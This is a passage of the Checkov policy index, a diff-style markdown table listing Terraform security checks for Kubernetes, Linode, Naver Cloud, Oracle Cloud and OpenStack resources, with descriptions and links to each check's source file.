[DropCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DropCapabilities.py) | +| 1951 | CKV_K8S_29 | resource | kubernetes_daemon_set_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1952 | CKV_K8S_29 | resource | kubernetes_daemonset | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1953 | CKV_K8S_29 | resource | kubernetes_deployment | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1954 | CKV_K8S_29 | resource | kubernetes_deployment_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1955 | CKV_K8S_29 | resource | kubernetes_pod | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1956 | CKV_K8S_29 | resource | kubernetes_pod_v1 | Apply security context to your pods, deployments and daemon_sets | Terraform | [PodSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/PodSecurityContext.py) | +| 1957 | CKV_K8S_30 | resource | kubernetes_deployment | Apply security context to your pods and containers | Terraform | 
[ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1958 | CKV_K8S_30 | resource | kubernetes_deployment_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1959 | CKV_K8S_30 | resource | kubernetes_pod | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1960 | CKV_K8S_30 | resource | kubernetes_pod_v1 | Apply security context to your pods and containers | Terraform | [ContainerSecurityContext.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ContainerSecurityContext.py) | +| 1961 | CKV_K8S_32 | resource | kubernetes_pod_security_policy | Ensure default seccomp profile set to docker/default or runtime/default | Terraform | [SeccompPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/SeccompPSP.py) | +| 1962 | CKV_K8S_34 | resource | kubernetes_deployment | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1963 | CKV_K8S_34 | resource | kubernetes_deployment_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1964 | CKV_K8S_34 | resource | kubernetes_pod | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1965 | CKV_K8S_34 | 
resource | kubernetes_pod_v1 | Ensure that Tiller (Helm v2) is not deployed | Terraform | [Tiller.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Tiller.py) | +| 1966 | CKV_K8S_35 | resource | kubernetes_deployment | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1967 | CKV_K8S_35 | resource | kubernetes_deployment_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1968 | CKV_K8S_35 | resource | kubernetes_pod | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1969 | CKV_K8S_35 | resource | kubernetes_pod_v1 | Prefer using secrets as files over secrets as environment variables | Terraform | [Secrets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/Secrets.py) | +| 1970 | CKV_K8S_36 | resource | kubernetes_pod_security_policy | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilitiesPSP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilitiesPSP.py) | +| 1971 | CKV_K8S_37 | resource | kubernetes_deployment | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1972 | CKV_K8S_37 | resource | kubernetes_deployment_v1 | Minimise the admission of containers with capabilities assigned | Terraform | 
[MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1973 | CKV_K8S_37 | resource | kubernetes_pod | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1974 | CKV_K8S_37 | resource | kubernetes_pod_v1 | Minimise the admission of containers with capabilities assigned | Terraform | [MinimiseCapabilities.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/MinimiseCapabilities.py) | +| 1975 | CKV_K8S_39 | resource | kubernetes_deployment | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1976 | CKV_K8S_39 | resource | kubernetes_deployment_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1977 | CKV_K8S_39 | resource | kubernetes_pod | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1978 | CKV_K8S_39 | resource | kubernetes_pod_v1 | Do not use the CAP_SYS_ADMIN linux capability | Terraform | [AllowedCapabilitiesSysAdmin.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/AllowedCapabilitiesSysAdmin.py) | +| 1979 | CKV_K8S_41 | resource | kubernetes_service_account | Ensure that default service accounts are not actively used | Terraform | 
[DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1980 | CKV_K8S_41 | resource | kubernetes_service_account_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccount.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccount.py) | +| 1981 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1982 | CKV_K8S_42 | resource | kubernetes_cluster_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1983 | CKV_K8S_42 | resource | kubernetes_role_binding | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1984 | CKV_K8S_42 | resource | kubernetes_role_binding_v1 | Ensure that default service accounts are not actively used | Terraform | [DefaultServiceAccountBinding.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/DefaultServiceAccountBinding.py) | +| 1985 | CKV_K8S_43 | resource | kubernetes_deployment | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1986 | CKV_K8S_43 | resource | kubernetes_deployment_v1 | Image should use digest | Terraform | 
[ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1987 | CKV_K8S_43 | resource | kubernetes_pod | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1988 | CKV_K8S_43 | resource | kubernetes_pod_v1 | Image should use digest | Terraform | [ImageDigest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/ImageDigest.py) | +| 1989 | CKV_K8S_44 | resource | kubernetes_service | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1990 | CKV_K8S_44 | resource | kubernetes_service_v1 | Ensure that the Tiller Service (Helm v2) is deleted | Terraform | [TillerService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/TillerService.py) | +| 1991 | CKV_K8S_49 | resource | kubernetes_cluster_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1992 | CKV_K8S_49 | resource | kubernetes_cluster_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1993 | CKV_K8S_49 | resource | kubernetes_role | Minimize wildcard use in Roles and ClusterRoles | Terraform | [WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1994 | CKV_K8S_49 | resource | kubernetes_role_v1 | Minimize wildcard use in Roles and ClusterRoles | Terraform | 
[WildcardRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/kubernetes/WildcardRoles.py) | +| 1995 | CKV_LIN_1 | provider | linode | Ensure no hard coded Linode tokens exist in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/linode/credentials.py) | +| 1996 | CKV_LIN_2 | resource | linode_instance | Ensure SSH key set in authorized_keys | Terraform | [authorized_keys.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/authorized_keys.py) | +| 1997 | CKV_LIN_3 | resource | linode_user | Ensure email is set | Terraform | [user_email_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_email_set.py) | +| 1998 | CKV_LIN_4 | resource | linode_user | Ensure username is set | Terraform | [user_username_set.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/user_username_set.py) | +| 1999 | CKV_LIN_5 | resource | linode_firewall | Ensure Inbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_inbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_inbound_policy.py) | +| 2000 | CKV_LIN_6 | resource | linode_firewall | Ensure Outbound Firewall Policy is not set to ACCEPT | Terraform | [firewall_outbound_policy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/linode/firewall_outbound_policy.py) | +| 2001 | CKV_NCP_1 | resource | ncloud_lb_target_group | Ensure HTTP HTTPS Target group defines Healthcheck | Terraform | [LBTargetGroupDefinesHealthCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupDefinesHealthCheck.py) | +| 2002 | CKV_NCP_2 | resource | ncloud_access_control_group | Ensure every access control groups rule has a description | Terraform | 
[AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 2003 | CKV_NCP_2 | resource | ncloud_access_control_group_rule | Ensure every access control groups rule has a description | Terraform | [AccessControlGroupRuleDescription.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupRuleDescription.py) | +| 2004 | CKV_NCP_3 | resource | ncloud_access_control_group_rule | Ensure no security group rules allow outbound traffic to 0.0.0.0/0 | Terraform | [AccessControlGroupOutboundRule.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupOutboundRule.py) | +| 2005 | CKV_NCP_4 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 22 | Terraform | [AccessControlGroupInboundRulePort22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort22.py) | +| 2006 | CKV_NCP_5 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [AccessControlGroupInboundRulePort3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort3389.py) | +| 2007 | CKV_NCP_6 | resource | ncloud_server | Ensure Server instance is encrypted. | Terraform | [ServerEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerEncryptionVPC.py) | +| 2008 | CKV_NCP_7 | resource | ncloud_launch_configuration | Ensure Basic Block storage is encrypted. 
| Terraform | [LaunchConfigurationEncryptionVPC.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LaunchConfigurationEncryptionVPC.py) | +| 2009 | CKV_NCP_8 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 20 | Terraform | [NACLInbound20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound20.py) | +| 2010 | CKV_NCP_9 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 21 | Terraform | [NACLInbound21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound21.py) | +| 2011 | CKV_NCP_10 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 22 | Terraform | [NACLInbound22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound22.py) | +| 2012 | CKV_NCP_11 | resource | ncloud_network_acl_rule | Ensure no NACL allow inbound from 0.0.0.0:0 to port 3389 | Terraform | [NACLInbound3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLInbound3389.py) | +| 2013 | CKV_NCP_12 | resource | ncloud_network_acl_rule | An inbound Network ACL rule should not allow ALL ports. 
| Terraform | [NACLPortCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NACLPortCheck.py) | +| 2014 | CKV_NCP_13 | resource | ncloud_lb_listener | Ensure LB Listener uses only secure protocols | Terraform | [LBListenerUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsesSecureProtocols.py) | +| 2015 | CKV_NCP_14 | resource | ncloud_nas_volume | Ensure NAS is securely encrypted | Terraform | [NASEncryptionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NASEncryptionEnabled.py) | +| 2016 | CKV_NCP_15 | resource | ncloud_lb_target_group | Ensure Load Balancer Target Group is not using HTTP | Terraform | [LBTargetGroupUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBTargetGroupUsingHTTPS.py) | +| 2017 | CKV_NCP_16 | resource | ncloud_lb | Ensure Load Balancer isn't exposed to the internet | Terraform | [LBNetworkPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBNetworkPrivate.py) | +| 2018 | CKV_NCP_18 | resource | ncloud_auto_scaling_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. | Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2019 | CKV_NCP_18 | resource | ncloud_lb_target_group | Ensure that auto Scaling groups that are associated with a load balancer, are using Load Balancing health checks. 
| Terraform | [AutoScalingEnabledLB.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AutoScalingEnabledLB.yaml) | +| 2020 | CKV_NCP_19 | resource | ncloud_nks_cluster | Ensure Naver Kubernetes Service public endpoint disabled | Terraform | [NKSPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSPublicAccess.py) | +| 2021 | CKV_NCP_20 | resource | ncloud_route | Ensure Routing Table associated with Web tier subnet have the default route (0.0.0.0/0) defined to allow connectivity | Terraform | [RouteTableNATGatewayDefault.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/RouteTableNATGatewayDefault.py) | +| 2022 | CKV_NCP_22 | resource | ncloud_nks_cluster | Ensure NKS control plane logging enabled for all log types | Terraform | [NKSControlPlaneLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/NKSControlPlaneLogging.py) | +| 2023 | CKV_NCP_22 | resource | ncloud_route_table | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2024 | CKV_NCP_22 | resource | ncloud_subnet | Ensure a route table for the public subnets is created. | Terraform | [RouteTablePublicSubnetConnection.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/RouteTablePublicSubnetConnection.yaml) | +| 2025 | CKV_NCP_23 | resource | ncloud_public_ip | Ensure Server instance should not have public IP. 
| Terraform | [ServerPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/ServerPublicIP.py) | +| 2026 | CKV_NCP_24 | resource | ncloud_lb_listener | Ensure Load Balancer Listener Using HTTPS | Terraform | [LBListenerUsingHTTPS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/LBListenerUsingHTTPS.py) | +| 2027 | CKV_NCP_25 | resource | ncloud_access_control_group_rule | Ensure no access control groups allow inbound from 0.0.0.0:0 to port 80 | Terraform | [AccessControlGroupInboundRulePort80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/ncp/AccessControlGroupInboundRulePort80.py) | +| 2028 | CKV_NCP_26 | resource | ncloud_access_control_group | Ensure Access Control Group has Access Control Group Rule attached | Terraform | [AccessControlGroupRuleDefine.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/ncp/AccessControlGroupRuleDefine.yaml) | +| 2029 | CKV_OCI_1 | provider | oci | Ensure no hard coded OCI private key in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/oci/credentials.py) | +| 2030 | CKV_OCI_2 | resource | oci_core_volume | Ensure OCI Block Storage Block Volume has backup enabled | Terraform | [StorageBlockBackupEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockBackupEnabled.py) | +| 2031 | CKV_OCI_3 | resource | oci_core_volume | OCI Block Storage Block Volumes are not encrypted with a Customer Managed Key (CMK) | Terraform | [StorageBlockEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/StorageBlockEncryption.py) | +| 2032 | CKV_OCI_4 | resource | oci_core_instance | Ensure OCI Compute Instance boot volume has in-transit data encryption enabled | Terraform | 
[InstanceBootVolumeIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceBootVolumeIntransitEncryption.py) | +| 2033 | CKV_OCI_5 | resource | oci_core_instance | Ensure OCI Compute Instance has Legacy MetaData service endpoint disabled | Terraform | [InstanceMetadataServiceEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMetadataServiceEnabled.py) | +| 2034 | CKV_OCI_6 | resource | oci_core_instance | Ensure OCI Compute Instance has monitoring enabled | Terraform | [InstanceMonitoringEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/InstanceMonitoringEnabled.py) | +| 2035 | CKV_OCI_7 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage bucket can emit object events | Terraform | [ObjectStorageEmitEvents.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEmitEvents.py) | +| 2036 | CKV_OCI_8 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage has versioning enabled | Terraform | [ObjectStorageVersioning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageVersioning.py) | +| 2037 | CKV_OCI_9 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is encrypted with Customer Managed Key | Terraform | [ObjectStorageEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStorageEncryption.py) | +| 2038 | CKV_OCI_10 | resource | oci_objectstorage_bucket | Ensure OCI Object Storage is not Public | Terraform | [ObjectStoragePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/ObjectStoragePublic.py) | +| 2039 | CKV_OCI_11 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain lower case | Terraform | 
[IAMPasswordPolicyLowerCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyLowerCase.py) | +| 2040 | CKV_OCI_12 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Numeric characters | Terraform | [IAMPasswordPolicyNumeric.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyNumeric.py) | +| 2041 | CKV_OCI_13 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Special characters | Terraform | [IAMPasswordPolicySpecialCharacters.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicySpecialCharacters.py) | +| 2042 | CKV_OCI_14 | resource | oci_identity_authentication_policy | OCI IAM password policy - must contain Uppercase characters | Terraform | [IAMPasswordPolicyUpperCase.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordPolicyUpperCase.py) | +| 2043 | CKV_OCI_15 | resource | oci_file_storage_file_system | Ensure OCI File System is Encrypted with a customer Managed Key | Terraform | [FileSystemEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/FileSystemEncryption.py) | +| 2044 | CKV_OCI_16 | resource | oci_core_security_list | Ensure VCN has an inbound security list | Terraform | [SecurityListIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngress.py) | +| 2045 | CKV_OCI_17 | resource | oci_core_security_list | Ensure VCN inbound security lists are stateless | Terraform | [SecurityListIngressStateless.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListIngressStateless.py) | +| 2046 | CKV_OCI_18 | resource | oci_identity_authentication_policy | OCI IAM password policy for local (non-federated) users has 
a minimum length of 14 characters | Terraform | [IAMPasswordLength.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/IAMPasswordLength.py) | +| 2047 | CKV_OCI_19 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 22. | Terraform | [SecurityListUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress22.py) | +| 2048 | CKV_OCI_20 | resource | oci_core_security_list | Ensure no security list allow ingress from 0.0.0.0:0 to port 3389. | Terraform | [SecurityListUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityListUnrestrictedIngress3389.py) | +| 2049 | CKV_OCI_21 | resource | oci_core_network_security_group_security_rule | Ensure security group has stateless ingress security rules | Terraform | [SecurityGroupsIngressStatelessSecurityRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/SecurityGroupsIngressStatelessSecurityRules.py) | +| 2050 | CKV_OCI_22 | resource | oci_core_network_security_group_security_rule | Ensure no security groups rules allow ingress from 0.0.0.0/0 to port 22 | Terraform | [AbsSecurityGroupUnrestrictedIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/oci/AbsSecurityGroupUnrestrictedIngress.py) | +| 2051 | CKV2_OCI_1 | resource | oci_identity_group | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2052 | CKV2_OCI_1 | resource | oci_identity_user | Ensure administrator users are not associated with API keys | Terraform | 
[AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2053 | CKV2_OCI_1 | resource | oci_identity_user_group_membership | Ensure administrator users are not associated with API keys | Terraform | [AdministratorUserNotAssociatedWithAPIKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/AdministratorUserNotAssociatedWithAPIKey.yaml) | +| 2054 | CKV2_OCI_2 | resource | oci_core_network_security_group_security_rule | Ensure NSG does not allow all traffic on RDP port (3389) | Terraform | [OCI_NSGNotAllowRDP.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NSGNotAllowRDP.yaml) | +| 2055 | CKV2_OCI_3 | resource | oci_containerengine_cluster | Ensure Kubernetes engine cluster is configured with NSG(s) | Terraform | [OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_KubernetesEngineClusterEndpointConfigWithNSG.yaml) | +| 2056 | CKV2_OCI_4 | resource | oci_file_storage_export | Ensure File Storage File System access is restricted to root users | Terraform | [OCI_NFSaccessRestrictedToRootUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_NFSaccessRestrictedToRootUsers.yaml) | +| 2057 | CKV2_OCI_5 | resource | oci_containerengine_node_pool | Ensure Kubernetes Engine Cluster boot volume is configured with in-transit data encryption | Terraform | [OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterBootVolConfigInTransitEncryption.yaml) | +| 2058 | CKV2_OCI_6 | resource | oci_containerengine_cluster | Ensure Kubernetes Engine Cluster pod security policy is enforced | 
Terraform | [OCI_K8EngineClusterPodSecPolicyEnforced.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/oci/OCI_K8EngineClusterPodSecPolicyEnforced.yaml) | +| 2059 | CKV_OPENSTACK_1 | provider | openstack | Ensure no hard coded OpenStack password, token, or application_credential_secret exists in provider | Terraform | [credentials.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/provider/openstack/credentials.py) | +| 2060 | CKV_OPENSTACK_2 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2061 | CKV_OPENSTACK_2 | resource | openstack_networking_secgroup_rule_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 22 (tcp / udp) | Terraform | [SecurityGroupUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/openstack/SecurityGroupUnrestrictedIngress22.py) | +| 2062 | CKV_OPENSTACK_3 | resource | openstack_compute_secgroup_v2 | Ensure no security groups allow ingress from 0.0.0.0:0 to port 3389 (tcp / udp) | Terraform | 